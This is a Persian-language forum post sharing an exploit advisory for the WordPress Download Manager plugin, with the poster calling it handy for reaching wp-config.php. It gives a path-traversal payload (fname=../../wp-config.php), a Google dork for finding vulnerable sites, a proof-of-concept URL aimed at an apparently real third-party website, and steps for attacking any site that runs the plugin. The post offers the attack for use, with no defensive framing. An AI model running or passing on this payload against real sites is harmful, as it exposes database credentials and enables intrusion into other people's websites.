SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

WordPress Download Manager Plugin - Arbitrary File Download

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • WordPress Download Manager Plugin - Arbitrary File Download

    درود...

    اینم یه آسیب پذیری از وردپرس که به درد بخور میتونه باشه!  ( دسترسی به Wp-config.php)

    کد:
    [php]# WordPress Download Manager Plugin - Arbitrary File Download
    # CWE: CWE-98
    # Risk: High
    # Author: Hugo Santiago dos Santos
    # Contact: [email protected]
    # Date: 25/10/2014
    # Vendor Homepage: https://wordpress.org/plugins/download-manager/
    # Tested on: Windows 7 and Gnu/Linux
    # Google Dork: inurl:/plugins/download-manager/
    
    # VUL: /views/file_download.php?fname=
      
     or:
    
     /file_download.php?fname=
    
    # PoC : 
    
     http://triec.ca/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
    
    
    # Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php[/php]
    [align=center]

    [/align]
صبر کنید ..
X